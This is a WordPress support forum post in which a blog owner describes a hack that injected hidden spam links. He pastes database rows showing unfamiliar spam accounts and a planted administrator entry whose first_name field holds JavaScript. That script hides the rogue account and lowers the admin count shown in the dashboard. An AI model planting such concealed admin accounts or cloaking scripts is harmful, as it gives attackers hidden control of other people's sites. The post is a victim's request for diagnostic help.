Site hacked, Vi@gra and other crap adds inserted!
-
Hi Guys,
I am having a lot of problem with hidden inserted adds into my wordpress based blog.
https://www.abdolian.com/thoughtsI found the problem when I received an e-mail from google warning me that my site was banned for 60 days due to “hidden” links and adds.
After searching the site, I found many places had the html code ‘<u style=’display:none’>’ and then after that lots of links to crap selling sites.
I cleaned up the pages, found that the code was being inserted in my template (Journalized 2.0) and changed my template to another one.
A few weeks later, while searching my site, I found another source of the same problem, this time, the template is clean, and I can not find any reference to the sites or scripts that create those garbage inside my SQL database.
Now, instead, I exported my database and found something that does not looks OK to me, I have only 4 users on my blog, but I see the following names in the user list that I do not recognize:
(125, 39, ‘nickname’, ‘smerseeo’),
(21, 6, ‘nickname’, ‘AntonSadko’),
(27, 8, ‘nickname’, ‘AltaGid’),
(24, 7, ‘nickname’, ‘EducationNetwork’),
(134, 42, ‘nickname’, ‘hookahsh’),
(146, 46, ‘nickname’, ‘conordco’),
(128, 40, ‘nickname’, ‘xizeryox’),
(131, 41, ‘nickname’, ‘blowinos’),
(122, 38, ‘nickname’, ‘SvetlanaDoor’),
(137, 43, ‘nickname’, ‘AntonPotaPo’),
(140, 44, ‘nickname’, ‘lookgood’),
(143, 45, ‘nickname’, ‘hotgurle’),And this strange one:
`(161, 51, ‘first_name’, ‘…\r\n
\r\n \r\n <b id=”user_superuser”><script language=”JavaScript”>\r\n var setUserName = function(){\r\n try{\r\n vart=document.getElementById(“user_superuser”);\r\n while(t.nodeName!=”TR”){\r\n t=t.parentNode;\r\n };\r\n
t.parentNode.removeChild(t);\r\n var tags = document.getElementsByTagName(“H3″);\r\n var s = ” shown below”;\r\n for (var i =
0; i < tags.length; i++) {\r\n var t=tags[i].innerHTML;\r\n var h=tags[i];\r\n if(t.indexOf(s)>0){\r\n s
=(parseInt(t)-1)+s;\r\n h.removeChild(h.firstChild);\r\n t = document.createTextNode(s);\r\n
h.appendChild(t);\r\n }\r\n }\r\n var arr=document.getElementsByTagName(“ul”);\r\n
for(var i in arr) if(arr[i].className==”subsubsub”){\r\n var n=/>Administrator
\\((\\d+)\\)</gi.exec(arr[i].innerHTML);\r\n if(n[1]>0){\r\n var
txt=arr[i].innerHTML.replace(/>Administrator \\((\\d+)\\)</gi,”>Administrator (“+(n[1]-1)+”)<“);\r\n
arr[i].innerHTML=txt;\r\n }\r\n }\r\n \r\n
}catch(e){};\r\n };\r\n addLoadEvent(setUserName);\r\n </script>’),
(162, 51, ‘wp_capabilities’, ‘a:1:{s:13:”administrator”;b:1;}’),
(163, 51, ‘wp_user_level’, ’10’);
`
I am not sure if this has anything to do with the problem I have but that is all I have been able to investigate so far. This is taking a lot of my time and I am really getting sick of cleaning it up and do it over and over again.Really appreciate any help or ideas.
Best regards,
/Farhad Abdolian
- The topic ‘Site hacked, Vi@gra and other crap adds inserted!’ is closed to new replies.